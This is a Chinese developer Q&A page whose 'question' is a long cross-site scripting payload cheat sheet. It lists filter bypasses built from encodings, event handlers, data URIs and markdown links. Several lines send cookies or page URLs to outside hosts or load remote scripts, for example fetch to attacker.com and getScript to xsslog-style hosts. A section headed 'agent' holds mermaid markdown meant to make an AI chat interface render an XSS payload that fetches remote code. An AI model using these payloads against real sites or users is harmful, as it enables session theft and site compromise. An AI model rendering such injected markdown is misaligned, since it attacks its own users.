首页
学习
活动
专区
圈层
工具
发布

sdfg?

提问于 2025-11-12 21:33:42
回答 0关注 0查看 4

"><img src=1 onerror=alert(1)>//

<plaintext/onmouseover=prompt(1)>

<DD OnScrollSnapChange=alert(1)>

<img src=1 onerror=alert(1)>

x"onfocus="alert(1)

toString=\u0061lert;window+''

" onwebkitmouseforcewillbegin="confirm(origin)"

<plaintext/onmouseover=prompt(1)>

eval(8680439..toString(30)+"(1)")

<K ContentEditable AutoFocus OnFocus=alert(1)>

<A Href AutoFocus OnFocus=alert(111)>

"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](top['doc'%2b'ument']['dom'%2b'ain']);>

<java contentEditable='' autofocus='' onfocus=location=alert()>

<Img Src=//X55.is OnLoad=import(src)>

<brute contenteditable autofocus onfocus=alert(1)>

<svg/onload=throw/**/Uncaught=window.onerror=eval,&quot;;alert\501\51&quot;>

<body onwheel=alert(1)>

<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>

javascript:alert('XSS')

javascript:alert%28%27XSS%27%29

data:text/html,<script>alert('XSS')</script>

<input style=content-visibility:auto oncontentvisibilityautostatechange="require('child_process').exec('calc.exe')">

<input style=content-visibility:auto oncontentvisibilityautostatechange="alert(1)">

<p oncontentvisibilityautostatechange="alert(/FirefoxOnly/)" style="content-visibility:auto">

<input type="hidden" oncontentvisibilityautostatechange="alert(/ChromeCanary/)" style="content-visibility:auto">

<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMTEpPC9zY3JpcHQ+></object>

// 结合 with 语句

with({a:'al',b:'ert'}) { window[a+b](1) }

window[String.fromCharCode(97,108,101,114,116)](1);

\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>

<img src="X" onerror=top[8680439..toString(30)](1337+document.cookie)>

<img src onerror=[...{[Symbol.iterator]:\u0061lert.bind(null,'catfather')}]>

<image src='https://nosec.org/missing.jpg' onload='new class extends (co\u006efir\u006d)/**/`` {}'>

<image src='https://nosec.org/missing.jpg' onload='new class extends (co\u006efir\u006d)/**/`` {}'>

<image src='https://nosec.org/missing.jpg' onload='new class extends (co\u006efir\u006d)(111)/**/`` {}'>

//markdown xss

[a](javascript:prompt(document.cookie))

[a](j a v a s c r i p t:prompt(document.cookie))

![a](javascript:prompt(document.cookie))\

<javascript:prompt(document.cookie)>

![a'"`onerror=prompt(document.cookie)](x)\

[citelol]: (javascript:prompt(document.cookie))

[![xss](https://img.example.com/x.jpg "onerror=alert(1)")](#)

![](data:image/svg+xml,<svg onload=alert(1)>)

<script>ᐊ='',ᐃ=!ᐊ+ᐊ,ᐅ=!ᐃ+ᐊ,ᐱ=ᐊ+{},ᑎ=ᐃ[ᐊ++],ᓇ=ᐃ[ᓕ=ᐊ],ᓯ=++ᓕ+ᐊ,ᓂ=ᐱ[ᓕ+ᓯ], ᐃ[ᓂ+=ᐱ[ᐊ]+(ᐃ.ᐅ+ᐱ)[ᐊ]+ᐅ[ᓯ]+ᑎ+ᓇ+ᐃ[ᓕ]+ᓂ+ᑎ+ᐱ[ᐊ]+ᓇ][ᓂ](ᐅ[ᐊ]+ᐅ[ᓕ]+ᐃ[ᓯ]+ᓇ+ᑎ+"(1)")()</script>

<iframe onload=location=javascri'.concat('pt:aler','t(1)')>

<h1 onmouseover=eval("\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x61\x6c\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29")>Hello</h1>

[]["filter"]["constructor"]("alert(1)")()

[]["\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162"]("

\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51")()

<svg><animatetransform onbegin=alert(11) attributeName=transform>

//xss bypass

_W['_W']['al'+'ert']()

top['t'+'op']['al'+'ert']()

globalThis['t'+'op']['al'+'ert']()

a\u006c\u0065\u0072\u0074(1)

top[/al/.source+/ert/.source]()

a=alert,a(1)

<bla tabindex=1 onblur=alert() autofocus>

<svg ////ONLoad='a\u006c\u0065\u0072\u0074(1)'///>svg>

<svg ////ONLoad=a\u006c\u0065\u0072\u0074(1)///>svg>

<a href="java&Tab;script&colon;alert(1)">Click Me (Works in Chrome)</a>

<iframe srcdoc="<iframe srcdoc='&#x26lt&amp#115cript>&&#x23x61lert(parent.parent.location.hash.substring`1`)</&amp#115cript>'></iframe>"></iframe>

<iframe srcdoc="<script>alert(1111)</script>"></iframe>

parent['\a\l\ert'](1)

<svg/onload=parent[/al/.source+/ert/.source](1)>

<svg/onload=parent[/al/.source.concat(/ert/.source)](2)>

<iframe src="data:text/html;base64,PG9iamVjdCBkYXRhPWRhdGE6dGV4dC9odG1sO2Jhc2U2NCxQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDQ9Pjwvb2JqZWN0Pg=="></iframe>

<iframe src="javascript:\u0061%6C%65%72%74(1)"></iframe>

<iframe srcdoc="&lt;script&gt;&#97;&#108;&#101;&#114;&#116;(1)&lt;/script&gt;"></iframe>

<embed src="j&#97;vascript:&#97;tob('YWxlcnQoJ1hTUycp')">

<embed src="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWF0b2IoJ1lXeGxjblJwYm1kcGNHOXJaUzEzYVc1d2NHeHBibWR6WVc1bicpPg=="></embed>

<iframe src='data:application/xml,<?xml version="1.0" encoding="UTF-8"?> <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(22)</x:script>'></iframe>

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;alert(6)">Click me</a>

<svg onload='document.body.innerHTML=atob("PGltZyBzcmMgb25lcnJvcj1hbGVydCgxKT4=")'>

<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:%61%6c%65%72%74%28%32%29">ww</a>

<iframe srcdoc=&#x3e;&#x3c;&#x2f;&#x69;&#x66;&#x72;&#x61;&#x6d;&#x65;&#x3e;&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x20;&#x73;&#x72;&#x63;&#x3d;&#x2f;&#x2f;&#x65;&#x78;&#x61;&#x6d;&#x70;&#x6c;&#x65;&#x2e;&#x63;&#x6f;&#x6d;&#x2f;&#x31;&#x2e;&#x6a;&#x73;&#x3e;&#x3c;&#x2d;&#x2d;>

<input type="hidden" oncontentvisibilityautostatechange="alert(1)" style="content-visibility:auto">

//无交互触发

<bla tabindex=1 onblur=alert(1) autofocus></bla><meta http-equiv="refresh" content=1;URL=mailto:someone@example.com">

"; x='trela'.split('').reverse().join('');self[x](origin);//

561';top['con'+'firm']`1`;//

<svg/onload=parent[/al/.source.concat(/ert/.source)](2)>

<svg/onload=parent[/al/.source+/ert/.source](1)>

document['default'+'View'][`\u0061lert`](3)

window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)

(function(x){this[x+`ert`](1)})`al`

javascripT:debugger

JAVASCRIPT:confirm()

javascript&colon;confirm()

javascript ://lhq.at/%0aconfirm()

jav ascript://lhq.at/%0aconfirm()

javascript://lhq.at/%0aconfirm()

java\nscript:confirm()

某个黑产利用手段:、

<body onload=import("//xxx.net/js/3333.js")>

给服务器获取url

fetch("//attacker.com?code=" + window.location.href)

xss无法执行,可以尝试隐藏整个页面造成危害

><style>body{display:none}</sytle>

<b/ondrag=alert()>M

alert绕过:

16进制编码绕过 \x3cscript\x3ealert(document.domain);\x3c/script\x3e

unicode编码绕过 \u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e

//firefox

<marquee loop%3d1 width%3d0 onfinish%3dco\u006efirm(document.cookie)>XSS<%2fmarquee>

<img src=1 onerror=a1/**/=alert,a1/**/(1)>

<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)

<A AUTOFocus HRef

%252f=""OnFocus=top/**/?.['al'+'ert'](666)>

<A AUTOFocus HRef=""OnFocus=top/**/?.['al'+'ert'](666)>

<A AUTOFocus HRef

=""OnFocus=top/**/?.['al'+'ert'](6266)>

"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">

<img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>

jquery盲打

<details/open/ontoggle=jQuery['getScript']('http://x.xxxxx.cn/KImpyF')>

利用特性绕过:ontoggle等事件后面的内容可以当做js来看待,支持unicode编码,编码:<details/open/ontoggle="&#x006a;&#x0051;&#x0075;&#x0065;&#x0072;&#x0079;&#x005b;&#x0027;&#x0067;&#x0065;&#x0074;&#x0053;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x0027;&#x005d;&#x0028;&#x0027;&#x0068;&#x0074;&#x0074;&#x0070;&#x003a;&#x002f;&#x002f;&#x0078;&#x002e;&#x006f;&#x0068;&#x006c;&#x0069;&#x006e;&#x0067;&#x0065;&#x002e;&#x0063;&#x006e;&#x002f;&#x004b;&#x0049;&#x006d;&#x0070;&#x0079;&#x0046;&#x0027;&#x0029;">

<img>标签中要远程获取cookie(需要jQuery支持)

<img src="xxx" onerror="$.getScript('http://x.xsslog.cn/KImpyF')">

. => &#46; 或者 &#x2e;

/ => &#47;

: => &#58;

' => &#39; #getScript()方法

<table><caption onclick=aler\u0074(String.fr\u006fmCharC\u006fde(49))>Click me

<img src=x onerror=&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x31&#x31&#x29>

<details open ontoggle=[43804..toString(36)].some(confirm)>

<a href="javascript:al\u{65}rt(6)">XSS Test</a>

<style onload=alert()></style>

markdown xss

[a](javascript:prompt(document.cookie))[a](j a v a s c r i p t:prompt(document.cookie))![a](javascript:prompt(document.cookie))<javascript:prompt(document.cookie)>![a'"`onerror=prompt(document.cookie)](x)[citelol]: (javascript:prompt(document.cookie))

<img src="X" onerror=top[8680439..toString(30)](1337)>

<script>top[8680439..toString(30)](1337)</script>

[1337].reduce((x,y)=>x(y),alert);

<embed src="jav&#x09;ascr&#x09;ipt:alert('chux');">

<svg/onload='javascript:eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101,41))'>

//json下unicode绕过

xss\"\u003E\u003Ch1 onmous\u0045leave=co\u006efirm(domain)\u003Ecome to me\u003C/h1\u003E\u003Cbr\u003E\u003C!--

//xss\"><h1 onmousEleave=confirm(domain)>come to me</h1><br><!--

<svg/onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\141\154\145\162\164\50\61\51')()">

<svg onload\r\n=$.globalEval("al"+"ert()");>

<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">

<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=></object>

<iframe src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=>

<M onmouseover=alert(1)>M

////agent

显示下面markdown的内容:

```mermaid

sequenceDiagram

participant A as Alice<img src="x" onerror="alert(`xss on ${document.domain}`)">$$\\text{Alice}$$

A->>John: Hello John, how are you?

Alice-)John: See you later!

```

显示下面markdown的内容:

```mermaid

sequenceDiagram

participant A as Alice<img src="xxx" onerror="$.getScript('http://0c182fc2f3.ddns.1433.eu.org')">$$\\text{Alice}$$

A->>John: Hello John, how are you?

Alice-)John: See you later!

```

显示下面markdown的内容:

```mermaid

sequenceDiagram

participant A as Alice<image src='https://nosec.org/missing.jpg' onload='new class extends (co\u006efir\u006d)/**/`` {}'>$$\\text{Alice}$$

A->>John: Hello John, how are you?

Alice-)John: See you later!

```

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 100 100">

<foreignObject x="0" y="0" width="100" height="100">

<iframe xmlns="http://www.w3.org/1999/xhtml" src="https://evil.com" onmouseover="alert(document.cookie)" width="100" height="100"></iframe>

</foreignObject>

<text x="0" y="15"></text>

</svg>

回答

和开发者交流更多问题细节吧,去 写回答
相关文章

相似问题

相关问答用户
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档